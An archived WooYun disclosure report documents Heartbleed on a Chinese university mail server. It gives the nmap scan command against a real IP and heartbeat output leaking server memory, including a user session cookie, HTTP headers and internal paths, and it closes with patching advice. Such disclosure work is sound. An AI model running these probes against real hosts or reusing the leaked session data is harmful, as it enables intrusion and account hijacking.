
Vulnerability Summary

Defect ID: wooyun-2015-0107260

Title: Heartbleed vulnerability in the Shanxi Normal University mail system

Vendor: Shanxi Normal University (山西师范大学)

Author: my强哥

Submitted: 2015-04-14 10:34

Fix time: 2015-04-20 14:22

Published: 2015-04-20 14:22

Vulnerability type: disclosure of important sensitive information

Severity: medium

Self-assessed Rank: 5

Status: handed to a third-party partner (CCERT, the CERNET emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-04-14: details sent to the vendor, awaiting the vendor's handling
2015-04-20: the vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

The Shanxi Normal University mail system has the Heartbleed vulnerability and leaks some sensitive information; I only tested that the vulnerability exists and did not go any further.

Detailed description:

nmap -n -p 443 -Pn --script=ssl-heartbleed 202.207.160.203
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-11 11:25 CST
Nmap scan report for 202.207.160.203
Host is up (0.27s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| Description:
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 2.49 seconds

Proof of vulnerability:

[*] 202.207.160.204:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 552823a316234a13b4cee491d77bc56adfcce2cf03061fbfd44ab4e0efa1c38b
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 7ac185e8f0e782acd013405092828d6c91744039bf788b5b1b006b1ce2f4d045
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 770
[!] Handshake #1:
[!] Length: 766
[!] Type: Certificate Data (11)
[!] Certificates length: 763
[!] Data length: 766
[!] Certificate #1:
[!] Certificate #1: Length: 760
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005d8ff68>, issuer=#<OpenSSL::X509::Name:0x00000005d8fef0>, serial=#<OpenSSL::BN:0x00000005d8fe50>, not_before=2012-11-01 07:46:36 UTC, not_after=2022-10-30 07:46:36 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 202.207.160.204:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 552823ae2d6c83eced7242995ea169752b0f174ddada883892bd09921dddacc3
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 6860b581a37bfd38b1b1e069e10e03dd8ced19769e36356637d00fa445414ea5
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 770
[!] Handshake #1:
[!] Length: 766
[!] Type: Certificate Data (11)
[!] Certificates length: 763
[!] Data length: 766
[!] Certificate #1:
[!] Certificate #1: Length: 760
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005780168>, issuer=#<OpenSSL::X509::Name:0x0000000577fee8>, serial=#<OpenSSL::BN:0x0000000577fd08>, not_before=2012-11-01 07:46:36 UTC, not_after=2022-10-30 07:46:36 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 202.207.160.204:443 - Sending Heartbeat...
[*] 202.207.160.204:443 - Heartbeat response, 19595 bytes
[+] 202.207.160.204:443 - Heartbeat response with leak
[*] 202.207.160.204:443 - Printable info leaked: U',m.w%zZt+yf"!98532ED/A}"S0RXe=_*?8ZQ1jF[AIabU6>E|5u#ygwODCO+2M&.vl=2Er|zxNtsBaq7p/onmlk]jHhrgsf%ed8c@\!Y3XWVTSP`LKJIDA^?G;Y<7654-&1.-,:)'%[$>"!~ 9NJ<@i'}/LUhyxt*fcZTRPK+i:943,)I86p"?l-A:f=="down"?l+A:l][f=="left"?n-h:f=="right"?n+h:n]}catch(y){return false}if(!v||a.$==v)return false;e[f=="up"||f=="left"?"unshift":"push"](new CKEDITOR.dom.element(v))}for(var f=a.getDocument(),x=l,A=v=0,C=!c&&new CKEDITOR.dom.documentFragment(f),D=0,f=0;f<e.length;f++){h=e[f];var F=h.getParent(),E=h.getFirst(),K=h.$.colSpan,I=h.$.rowSpan,F=F.$.rowIndex,G=d(i,F,h),D=D+K*I,A=Math.max(A,G-n+K);v=Math.max(v,F-l+I);if(!c){K=h;(I=K.getBogus())&&I.remove();K.trim();if(h.getChildren().count()){if(F!=x&&E&&(!E.isBlockBoundary||!E.isBlockBoundary({br:1})))(x=C.getLast(CKEDITOR.dom.walker.whitespaces(true)))&&(!x.is||!x.is("br"))&&C.append("br");h.moveChildren(C)}f?h.remove():h.setHtml("")}x=F}if(c)return v*A==D;C.moveChildren(a);CKEDITOR.env.ie||a.appendBogus();A>=k?a.removeAttribute("rowSpan"):a.$.rowSpan=v;v>=j?a.removeAttribute("colSpan"):a.$.colSpan=A;c=new CKEDITOR.dom.nodeList(g.$.rows);e=c.count();for(f=e-1;f>=0;f--){g=c.getItem(f);if(!g.$.cells.length){g.remove();e++}}return a}function k(a,f){var c=b(a);if(c.length>1)return false;if(f)return true;var c=c[0],e=c.getParent(),g=e.getAscendant("table"),h=CKEDITOR.tools.buildTableMap(g),i=e.$.rowIndex,j=d(h,i,c),k=c.$.rowSpan,l;if(k>1){l=Math.ceil(k/2);for(var k=Math.floor(k/2),e=i+l,g=new CKEDITOR.dom.element(g.$.rows[e]),h=d(h,e),n,e=c.clone(),i=0;i<h.length;i++){n=h[i];if(n.parentNode==g.$&&i>j){e.insertBefore(new CKEDITOR.dom.element(n));break}else n=null}n||g.append(e,true)}else{k=l=1;g=e.clone();g.insertAfter(e);g.append(e=c.clone());n=d(h,i);for(j=0;j<n.length;j++)n[j].rowSpan++}CKEDITOR.env.ie||e.appendBogus();c.$.rowSpan=l;e.$.rowSpan=k;l==1&&c.removeAttribute("rowSpan");k==1&&e.removeAttribute("rowSpan");return e}function l(a,f){var c=b(a);if(c.length>1)return false;if(f)return 
true;var c=c[0],e=c.getParent(),g=e.getAscendant("table"),g=CKEDITOR.tools.buildTableMap(g),h=d(g,e.$.rowIndex,c),i=c.$.colSpan;if(i>1){e=Math.ceil(i/2);i=Math.floor(i/2)}else{for(var i=e=1,j=[],k=0;k<g.length;k++){var l=g[k];j.push(l[h]);l[h].rowSpan>1&&(k=k+(l[h].rowSpan-1))}for(g=0;g<j.length;g++)j[g].colSpan++}g=c.clone();g.insertAfter(c);CKEDITOR.env.ie||g.appendBogus();c.$.colSpan=e;g.$.colSpan=i;e==1&&c.removeAttribute("colSpan");i==1&&g.removeAttribute("colSpan");return g}var n=/^(?:td|th)$/;CKEDITOR.plugins.tabletools={requires:"table,dialog,contextmenu",init:function(d){function e(a){return CKEDITOR.tools.extend(a||{},{contextSensitive:1,refresh:function(a,b){this.setState(b.contains({td:1,th:1},1)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED)}})}var n=d.lang.table;d.addCommand("cellProperties",new CKEDITOR.dialogCommand("cellProperties",e()));CKEDITOR.dialog.add("cellProperties",this.path+"dialogs/tableCell.js");d.addCommand("rowDelete",e({exec:function(b){b=b.getSelection();g(a(b))}}));d.addCommand("rowInsertBefore",e({exec:function(a){a=a.getSelection();c(a,true)}}));d.addCommand("rowInsertAfter",e({exec:function(a){a=a.getSelection();c(a)}}));d.addCommand("columnDelete",e({exec:function(a){for(var a=a.getSelection(),a=b(a),f=a[0],d=a[a.length-1],a=f.getAscendant("table"),c=CKEDITOR.tools.buildTableMap(a),e,h,i=[],j=0,k=c.length;j<k;j++)for(var l=0,m=c[j].length;l<m;l++){c[j][l]==f.$&&(e=l);c[j][l]==d.$&&(h=l)}for(j=e;j<=h;j++)for(l=0;l<c.length;l++){d=c[l];f=new CKEDITOR.dom.element(a.$.rows[l]);d=new CKEDITOR.dom.element(d[j]);if(d.$){d.$.colSpan==1?d.remove():d.$.colSpan=d.$.colSpan-1;l=l+(d.$.rowSpan-1);f.$.cells.length||i.push(f)}}h=a.$.rows[0]&&a.$.rows[0].cells;e=new 
CKEDITOR.dom.element(h[e]||(e?h[e-1]:a.$.parentNode));i.length==k&&a.remove();e&&g(e,true)}}));d.addCommand("columnInsertBefore",e({exec:function(a){a=a.getSelection();h(a,true)}}));d.addCommand("columnInsertAfter",e({exec:function(a){a=a.getSelection();h(a)}}));d.addCommand("cellDelete",e({exec:function(a){a=a.getSelection();f(a)}}));d.addCommand("cellMerge",e({exec:function(a){g(j(a.getSelection()),true)}}));d.addCommand("cellMergeRight",e({exec:function(a){g(j(a.getSelection(),"right"),true)}}));d.addCommand("cellMergeDown",e({exec:function(a){g(j(a.getSelection(),"down"),true)}}));d.addCommand("cellVerticalSplit",e({exec:function(a){g(k(a.getSelection()))}}));d.addCommand("cellHorizontalSplit",e({exec:function(a){g(l(a.getSelection()))}}));d.addCommand("cellInsertBefore",e({exec:function(a){a=a.getSelection();i(a,true)}}));d.addCommand("cellInsertAfter",e({exec:function(a){a=a.getSelection();i(a)}}));d.addMenuItems&&d.addMenuItems({tablecell:{label:n.cell.menu,group:"tablecell",order:1,getItems:function(){var 
a=d.getSelection(),f=b(a);return{tablecell_insertBefore:CKEDITOR.TRISTATE_OFF,tablecell_insertAfter:CKEDITOR.TRISTATE_OFF,tablecell_delete:CKEDITOR.TRISTATE_OFF,tablecell_merge:j(a,null,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_merge_right:j(a,"right",true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_merge_down:j(a,"down",true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_split_vertical:k(a,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_split_horizontal:l(a,true)?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED,tablecell_properties:f.length>0?CKEDITOR.TRISTATE_OFF:CKEDITOR.TRISTATE_DISABLED}}},tablecell_insertBefore:{label:n.cell.insertBefore,group:"tablecell",command:"cellInsertBefore",order:5},tablecell_insertAfter:{label:n.cell.insertAfter,group:"tablecell",command:"cellInsertAfter",order:10},tablecell_delete:{label:n.cell.deleteCell,group:"tablecell",command:"cellDelete",order:15},tablecell_merge:{label:n.cell.merge,group:"tablecell",command:"cellMerge",order:16},tablecell_merge_right:{label:n.cell.mergeRight,group:"tablecell",command:"cellMergeRight",order:17},tablecell_merge_down:{label:n.cell.mergeDown,group:"tablecell",command:"cellMergeDown",order:18},tablecell_split_horizontal:{label:n.cell.splitHorizontal,group:"tablecell",command:"cellHorizontalSplit",order:19},tablecell_split_vertical:{label:n.cell.splitVertical,group:"tablecell",command:"cellVerticalSplit",order:20},tablecell_properties:{label:n.cell.title,group:"tablecellproperties",command:"cellProperties",order:21},tablerow:{label:n.row.menu,group:"tablerow",order:1,getItems:function(){return{tablerow_insertBefore:CKEDITOR.TRISTATE_OFF,tablerow_insertAfter:CKEDITOR.TRISTATE_OFF,tablerow_delete:CKEDITOR.TRISTATE_OFF}}},tablerow_insertBefore:{label:n.row.insertBefore,group:"tablerow",command:"rowInsertBefore",order:5},tablerow_insertAfter:{label:n.row.insertAfter,group:"tablerow",command:"rowInsertAfter",order:10},tablerow_delete:{l
abel:n.row.deleteRow,group:"tablerow",command:"rowDelete",order:15},tablecolumn:{label:n.column.menu,group:"tablecolumn",order:1,getItems:function(){return{tablecolumn_insertBefore:CKEDITOR.TRISTATE_OFF,tablecolumn_insertAfter:CKEDITOR.TRISTATE_OFF,tablecolumn_delete:CKEDITOR.TRISTATE_OFF}}},tablecolumn_insertBefore:{label:n.column.insertBefore,group:"tablecolumn",command:"columnInsertBefore",order:5},tablecolumn_insertAfter:{label:n.column.insertAfter,group:"tablecolumn",command:"columnInsertAfter",order:10},tablecolumn_delete:{label:n.column.deleteColumn,group:"tablecolumn",command:"columnDelete",order:15}});d.contextMenu&&d.contextMenu.addListener(function(a,b,f){return(a=f.contains({td:1,th:1},1))&&!a.isReadOnly()?{tablecell:CKEDITOR.TRISTATE_OFF,tablerow:CKEDITOR.TRISTATE_OFF,tablecolumn:CKEDITOR.TRISTATE_OFF}:null})},getSelectedCells:b};CKEDITOR.plugins.add("tabletools",CKEDITOR.plugins.tabletools)}(),CKEDITOR.tools.buildTableMap=function(b){for(var b=b.$.rows,c=-1,a=[],e=0;e<b.length;e++){c++;!a[c]&&(a[c]=[]);for(var h=-1,i=0;i<b[e].cells.length;i++){var f=b[e].cells[i];for(h++;a[c][h];)h++;for(var g=isNaN(f.colSpan)?1:f.colSpan,f=isNaN(f.rowSpan)?1:f.rowSpan,d=0;d<f;d++){a[c+d]||(a[c+d]=[]);for(var j=0;j<g;j++)a[c+d][h+j]=b[e].cells[i]}h=h+(g-1)}}return a},function(){CKEDITOR.plugins.add("templates",{requires:"dialog",init:function(a){CKEDITOR.dialog.add("templates",CKEDITOR.getUrl(this.path+"dialogs/templates.js"));a.addCommand("templates",new CKEDITOR.dialogCommand("templates"));a.ui.addButton&&a.ui.addButton("Templates",{label:a.lang.templates.button,command:"templates",toolbar:"doctools,10"})}});var b={},c={};CKEDITOR.addTemplates=function(a,c){b[a]=c};CKEDITOR.getTemplates=function(a){return b[a]};CKEDITOR.loadTemplates=function(a,b){for(var 
h=[],i=0,f=a.length;i<f;i++)if(!c[a[i]]){h.push(a[i]);c[a[i]]=1}h.length?CKEDITOR.scriptLoader.load(h,b):setTimeout(b,0)}}(),CKEDITOR.config.templates_files=[CKEDITOR.getUrl("plugins/templates/templates/default.js")],CKEDITOR.config.templates_replaceContent=!0,function(){function b(a){function b(){for(var d=f(),i=CKEDITOR.tools.clone(a.config.toolbarGroups)||c(a),l=0;l<i.length;l++){var n=i[l];if(n!="/"){typeof n=="string"&&(n=i[l]={name:n});var m,o=n.groups;if(o)for(var q=0;q<o.length;q++){m=o[q];(m=d[m])&&e(n,m)}(m=d[n.name])&&e(n,m)}}return i}function f(){var b={},f,d,c;for(f in a.ui.items){d=a.ui.items[f];c=d.toolbar||"others";c=c.split(",");d=c[0];c=parseInt(c[1]||-1,10);b[d]||(b[d]=[]);b[d].push({name:f,order:c})}for(d in b)b[d]=b[d].sort(function(a,b){return a.order==b.order?0:b.order<0?-1:a.order<0?1:a.order<b.order?-1:1});return b}function e(a,b){if(b.length){a.items?a.items.push("-"):a.items=[];for(var f;f=b.shift();)a.items.push(f.name)}}var d=a.config.toolbar;typeof d=="string"&&(d=a.config["toolbar_"+d]);return a.toolbar=d||b()}function c(a){return a._.toolbarGroups||(a._.toolbarGroups=[{name:"document",groups:["mode","document","doctools"]},{name:"clipboard",groups:["clipboard","undo"]},{name:"editing",groups:["find","selection","spellchecker"]},{name:"forms"},"/",{name:"basicstyles",groups:["basicstyles","cleanup"]},{name:"paragraph",groups:["list","indent","blocks","align"]},{name:"links"},{name:"insert"},"/",{name:"styles"},{name:"colors"},{name:"tools"},{name:"others"},{name:"about"}])}var a=function(){this.toolbars=[];this.focusCommandExecuted=false};a.prototype.focus=function(){for(var a=0,b;b=this.toolbars[a++];)for(var f=0,c;c=b.items[f++];)if(c.focus){c.focus();return}};var e={modes:{wysi+pLal1/js/settings.js?v=8.1.0.3 HTTP/1.1Host 202.207.160.204Connection keep-aliveUser-Agent Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36Accept */*Referer 
http://202.207.160.204/?q=login.load_cacheAccept-Encoding gzip,deflate,sdchAccept-Language en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie EMPHPSID=su8dqsbaomh5vi59chp57oscp0; empos=09pLpLabR`^X~ Yr Yr T ZZ\@4N*pOgN@0NNW~NNWNgNW'ZObOW-@gO*pOWx$OOW}/O#OWd@O,OWn-help{background-position:-48px -144px}.ui-icon-check{background-position:-64px -144px}.ui-icon-bullet{background-position:-80px -144px}.ui-icon-radio-off{background-position:-96px -144px}.ui-icon-radio-on{background-position:-112px -144px}.ui-icon-pin-w{background-position:-128px -144p|Vi-ichostconnectionuser-agentacceptrefereraccept-encodingaccept-languagecookieionX4XXN'/user/tpl1/js/settings.jsjsgw/usr/local/eyou/mail/web/tpl/user/tpl1/js/settings.js.jsYX<G<GDY5X<GRFri, 18 Mar 2016 19:23:41 GMT max-age=315360006000application/javascriptrip]`^$Z\\]<Gr_<GoZT_\\Z\HTTP/1.1 200 OKServer: nginx/1.2.5Date: Thu, 19 Mar 2015 19:23:41 GMTContent-Type: application/javascriptLast-Modified: Mon, 28 Jan 2013 15:55:16 GMTTransfer-Encoding: chunkedConnection: keep-aliveExpires: Fri, 18 Mar 2016 19:23:41 GMTCache-Control: max-age=31536000Content-Encoding: gzip^_\RM%10Ybb<GbM%DYb\\\\\@a%\\\\\\\\\\"@a%\]]22"2@a%H]"X]P]BB2B@a%]2]]RRBR@a%]B]]bbRb@a%^R$^^rrbr@a%X^bh^D_((((@a%^(a%a%\\]X]$_],_]4_^<_\\$^\_h^_l_ `____@]%48e6]_L]_d_H H @]%l_8`@`]_X]`]`]`^`$^h^(`_0`H H @]%]\]t`X]|`]`@``115.24.32.192 - - [20/Mar/2015:03:23:41 +0800] 200 "GET /tpl/user/tpl1/js/settings.js?v=8.1.0.3 HTTP/1.1" 47365 "http://202.207.160.204/?q=login.load_cache" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" "-"34p567'&'%#$"543210/.-,+*)('&%$pL)" class="del_file"></a>';tdNode=trNode.insertCell(-1);tdNode.innerHTML='<a href="javascript:enjoy()" title="'+L("delete")+'" onclick="'+__this.__thisName+".delSmsFilter('send', false, '"+v.smsnotify_filter_id+'\');" class 
="change_file"></a>'});trNode=tableNode.insertRow(-1);trN@ode.style.height="28px";trNode.id="send_sms_filter_tr_buttom"+__this.__moduleExt;tdNode=trNode.insertCell(-1);tdNode.innerHTML='&nbsp;&nbsp;<input name="i" id="send_sms_filter_all'+__this.__moduleExt+'" type="checkbox" value="0" onclick="return '+__this.__thisName+".checkBoxBlur('sms_filter', 1, 'tb_sms_filter_send', 'send_sms_filter_all', 'smsnotify_filter_id[]', this);\"/>";tdNode=trNode.insertCell(-1);tdNode.innerHTML=L("select all");tdNode=trNode.insertCell(-1);tdNode.colSpan="4";tdNode.align="right";tdNode.innerHTML='<input name="send_sms_filter_del" id="send_sms_filter_del'+__this.__moduleExt+'" type="button" onclick="'+__this.__thisName+".delSmsFilter('send', true, '');\" value=\""+L("button delete")+'" class="btn" />';gMessage.hideMessageTop();__this.setSettingsSize()};this._drawUnsendSmsFilter=function(unsendData){$("#tb_sms_filter_unsend"+__this.__moduleExt).empty();var tableNode=g("tb_sms_filter_unsend"+__this.__moduleExt);var trNode,tdNode;trNode=tableNode.insertRow(-1);trNode.className="t_head";trNode.id="unsend_sms_filter_tr_head"+__this.__moduleExt;tdNode=trNode.insertCell(-1);tdNode.width="25";tdNode.innerHTML='&nbsp;&nbsp;<input id="head_unsend_sms_filter_all'+__this.__moduleExt+'" type="checkbox" name="" onclick="'+__this.__thisName+".checkBoxBlur('sms_filter', 1, 'tb_sms_filter_unsend', 'unsend_sms_filter_all', 'smsnotify_filter_id[]', this);\" value=\"\" />";tdNode=trNode.insertCell(-1);tdNode.width="25%";tdNode.innerHTML="<strong>"+L("keywords")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.width="25%";tdNode.innerHTML="<strong>"+L("filter scope")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.widht="28%";tdNode.id="operate_action"+__this.__moduleExt;tdNode.innerHTML="<strong>"+L("filter 
keywords")+"</strong>";tdNode=trNode.insertCell(-1);tdNode.width="10%";tdNode.className="cen";tdNode.innerHTML=L("modify");tdNode=trNode.insertCell(-1);tdNode.width="7%";tdNode.className="cen";tdNode.innerHTML=L("delete");$.each(unsendData,function(k,v){__this.smsFiterList[v.smsnotify_filter_id]=v;var scopeInt=v.scope-0;var scopeHtml=[];if(v.match_type==2){scopeHtml.push(L("the sender"))}else{if(scopeInt==1){scopeHtml.push(L("mail subject"))}else{if(scopeInt==2){scopeHtml.push(L("message body"))}else{scopeHtml.push(L("mail subject"));scopeHtml.push(L("message body"))}}}scopeHtml=scopeHtml.join(" | ");if(v.match_algo==0){var algo=L("not contain the keyword")}else{var algo=L("contain the keyword")}trNode=tableNode.insertRow(-1);trNode.id="tr_unsend_sms_filter"+v.smsnotify_filter_id+__this.__moduleExt;trNode.className="";tdNode=trNode.insertCell(-1);tdNode.innerHTML='&nbsp;&nbsp;<input name="smsnotify_filter_id[]" class="folder_ids" id="input_unsend_sms_filter'+v.smsnotify_filter_id+__this.__moduleExt+'" value="'+v.smsnotify_filter_id+'" type="checkbox" onclick="'+__this.__thisName+".checkBoxBlur('sms_filter', 0, 'tb_sms_filter_unsend', 'unsend_sms_filter_all', 'smsnotify_filter_id[]', this);\" />";tdNode=trNode.insertCell(-1);tdNode.innerHTML=htmlSpecialChars(v.keywords);tdNode.title=v.keywords;tdNode=trNode.insertCell(-1);tdNode.title=scopeHtml;tdNode.innerHTML=scopeHtml;tdNode=trNode.insertCell(-1);tdNode.title=algo;tdNode.innerHTML=algo;td
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Fix:

Upgrade OpenSSL to a release that is not affected (1.0.1g or later, per the OpenSSL advisory linked in the scan output) and restart every service linked against it, then re-run the check above to confirm the oversized heartbeat is refused. Because the leaked memory can contain the private key and live session data (the dump above already shows a user's EMPHPSID session cookie), treat the key as compromised: reissue the certificate, revoke the old one, and invalidate existing mail sessions after patching.

Copyright notice: please credit the source when reposting: my强哥@乌云


Vendor Response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-04-20 14:22

Vendor reply:

Vulnerability Rank: 8 (WooYun rating)

Latest status:

None

